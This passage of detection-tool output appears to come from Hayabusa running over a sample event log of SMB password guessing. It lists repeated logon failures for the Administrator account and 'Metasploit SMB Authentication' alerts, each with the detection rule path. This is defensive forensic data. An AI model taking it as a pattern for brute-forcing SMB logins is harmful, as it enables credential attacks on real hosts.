Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
